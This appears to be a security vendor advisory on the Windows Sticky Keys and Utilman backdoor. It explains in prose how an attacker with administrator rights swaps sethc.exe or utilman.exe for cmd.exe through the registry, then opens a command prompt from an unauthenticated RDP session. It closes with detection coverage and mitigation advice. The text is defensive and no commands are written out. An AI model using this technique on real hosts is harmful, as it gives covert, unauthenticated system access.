The Windows Sticky Keys and Utilman services store their binary paths in the Windows registry, allowing an attacker backdoor potential via modification of the registry value. By replacing the ‘sethc.exe’ and/or ‘utilman.exe’ values with the ‘cmd.exe’ binary, an attacker is able to spawn a command prompt on the target host via the service's intended shortcuts. When remote desktop protocol (RDP) is enabled on the target host, an attacker is able to spawn an unauthenticated RDP session and trigger the shortcut commands, spawning a command prompt on the target host.
- The attacker compromises the Windows host, obtaining shell access of at least administrator privilege.
- The attacker crafts custom ‘REG’ commands that replace sethc.exe and/or utilman.exe with cmd.exe. The attacker is then able to call cmd.exe using in-built Windows shortcuts (remotely exploitable (pre-auth) using remote desktop services).
- The prerequisite for implanting the backdoor: the attacker has the ability to edit the registry values via the ‘REG’ command.
- The prerequisite for triggering the backdoor: the attacker has the ability to spawn a remote graphical session on the target host (via RDP or other methods) and is not restricted by group policy from enabling Windows shortcuts ‘Sticky Keys’ or ‘Utility Manager’.
Alert Logic Coverage
Alert Logic® has evaluated its customer base for exposure to the exploit and has developed signatures for mitigating the threat depending on the security service in place.
Detection of this threat is provided via the Alert Logic ActiveWatch for Log Manager™ service. Log messages are produced by the vulnerable system when an exploit of this type is leveraged. An incident will be generated in the Alert Logic console if these log messages are observed.
Recommendations for Mitigation
The attacker must have exploited some other entry vector to gain access to the local victim host. Ensure that all software on internet-facing hosts is up-to-date.